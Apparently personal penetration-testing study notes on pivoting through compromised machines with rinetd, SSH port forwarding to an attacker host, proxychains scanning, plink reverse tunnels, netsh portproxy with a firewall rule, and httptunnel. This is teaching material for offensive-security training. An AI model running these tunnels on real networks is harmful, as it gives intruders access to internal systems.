Skip to main content

Port Redirection and Tunneling

Carry a protocol over a incompatible delivery network or provide a secure route in a untrusted network.

Port Forwarding

Redirect traffic from one ip and port to another ip and port.

Scenario

The Linux Web Server is compromised, and we have root previledges. The Linux Client is also compromised and we gain ssh credentials. (i.e. connected to Linux Client via 2 layers of ssh)

The linux client isn't connected to the internet, but connected with the Linux Web Server in internal network.

We now need to transfer data to and from the Linux Client.

What we can do it redirect traffic to port 80 of the Web Server to the internet. So the Linux Client can connect to internet through the Web Server.

RINETD

sudo apt update && sudo apt install rinetd
sudo leafpad /etc/rinetd.conf
# add the following
# bindaddress bindport    connectaddress 	connectport
0.0.0.0 		80 		216.58.207.142 		   80

sudo service rinetd restart
ss -antp | grep "80"		# port listening on port 80

# from the compromised machine, connect to port 80 of attacker machine
nc -nvv <IP> 80

What is does is, when the server machine receives an request on port 80, it's always sent to the destination address and port.

SSH Tunneling

SSH can create encrypted tunnels within ssh protocol.

Scenario

There are 3 machines in total. One attacker machine A, one compromised machine B (the Linux Client) connected to internet with only port 22, 8080, one machine C (windows) connected to B but only has access to local network.

We want to transfer data.

B redirects requests to to C via ssh.

SSH Local Port Forwarding

Tunnel a local port to a remote server.

sudo ssh -N -L 0.0.0.0:445:<target IP>:445 <username>@<IP>	# run this on attacker machine
# -N: no executing remote command
# -L: port forwarding, then bind port 445 of localhost to port 445 of remote machine
# username and IP are of the compromised machine (medium).

Change samba setting, min samba verstion to V2

min protocol = SMB2 in /etc/smbda/smb.conf

List windows shared files

# on compromise linux client
smbclient -L 127.0.0.1 -U Administrator

All traffic on the port should be redirected to the windows machine.

SSH Remote Port Forwarding

Reverse of SSH Local Port Forwarding.

ssh -N -R [bind_address:]port:host:hostport [username@address]
# example
ssh -N -R <attacker ip>:2221:127.0.0.1:3306 kali@<attacker ip>

bind_address is Attacker's IP address.

-R to open a port (let's say 2221) for listening on the Attacker machine,

Request to attacker machine's port 2221 will be forwarded to the linux client, and then to the SQL server running on that Linux client.

Check localhost port

ss -antp | grep "2221"

Flow: On attacker machine => send request to 127.0.0.1 port 2221 => request redirected to Linux Client port 3306 through the ssh tunnel.

# on attacker
sudo nmap -sS -sV 127.0.0.1 -p 2221

SSH Dynamic Port Forwarding

Similar to SSH Local Port Forwarding

No need to create a tunnel for every port or every target ip in the network.

# on attacker machine
ssh -N -D <address to bind to>:<port to bind to> <username>@<SSH server address> # -D for dynamic port forwarding

Redirect any traffic to localhost:8080 to target network.

<username>@<SSH server address> are for the compromised linux client.

We need to tell how to run proxy.

sudo leafpad /etc/proxychains.conf

add socks4 proxy to it socks4 127.0.0.1 8080

proxychains nmap --top-ports=20 -sT -Pn <IP>

PLINK.exe

A windows ssh client

Pivoting on windows machine.

Download the tool with ftp server.

cmd.exe /c echo y | plink.exe --ssh -l kali -pw <pwd> -R <attacker ip>:1234:127.0.0.1:3360 <attacker ip>

Scan target from attacker

sudo nmap -sS -sV 127.0.0.1 -p 1234

NETSH

Windows based tool.

netsh interface portproxy add v4tov4 listenport=4455 listenaddress=<attacker ip> connectpoty=445 connectaddress=<target ip>

Open port 4455 for inbound traffic on windows machine with netsh

netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=<attacker ip> localport=4455 action=allow

On attacker machine, configure samba to use smb2 as min protocol

smbclient -L <attacker ip> --port=4455 --user=Administrator

HTTPTunneling Through Deep Packet Inspection

Use HTTP protocol for tunnelling.

apt-cache search httptunnel

Use httptunnel to encapsulate traffic within http request (http tunnel).

HTTP uses client-server model.

sudo apt install httptunnel

hts --forward-port localhost:8888 1234
htc --forward-port 8080 10.11.0.128:1234